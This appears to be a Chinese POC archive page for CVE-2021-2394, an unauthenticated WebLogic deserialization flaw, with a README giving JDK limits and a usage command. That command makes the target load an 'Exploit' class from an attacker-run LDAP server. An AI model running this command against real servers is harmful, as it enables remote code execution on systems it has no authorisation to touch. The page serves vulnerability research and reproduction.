关联漏洞
标题:Oracle Fusion Middleware输入验证错误漏洞 (CVE-2021-2394)Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。 Oracle Fusion Middleware 存在安全漏洞,未经身份验证的攻击者可利用该漏洞通过T3,IIOP进行网络访问,以破坏Oracle WebLogic服务器。以下产品及版本受到影响:Oracle Fusion Middleware 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.
Description
POC of CVE-2021-2394
介绍
# CVE-2021-2394
POC of CVE-2021-2394
- 免责声明
- 项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
* 注意事项
* POC使用IIOP发包,请添加相关依赖(已将12.2.1.3.0版本的依赖放release)
* 请使用低版本的jdk安装weblogic进行测试
> 基于RMI的利用方式,JDK版本限制于6u132、7u131、8u121之前,在8u122及之后的版本中,加入了反序列化白名单的机制,关闭了RMI远程加载代码
> 基于LDAP的利用方式,JDK版本限制于6u211、7u201、8u191、11.0.1之前,在8u191版本中,Oracle对LDAP向量设置限制,发布了CVE-2018-3149,关闭JNDI远程类加载
> From:https://www.freebuf.com/vuls/279465.html
* 在虚拟机环境中无法复现可参考https://xz.aliyun.com/t/7498
* 使用方法:
* 启动一个ldap服务
* `java -jar CVE_2021_2394.jar rhost rport ldapurl`
* eg:`java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit`
* 参考链接:
* https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
* https://github.com/Y4er/CVE-2020-14756
* https://github.com/Y4er/CVE-2020-2551
* 更新
* 2021/8/15 删除一些不必要的代码
* 分析文章
* https://mp.weixin.qq.com/s/AxJJxbkclr4ijXX8lpNAfw
文件快照
[4.0K] /data/pocs/4bacb4d8f96af5baa97b29d74909ca24de4a58e1
├── [4.2K] CVE_2021_2394.java
├── [1.3K] README.md
└── [2.5K] Reflections.java
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。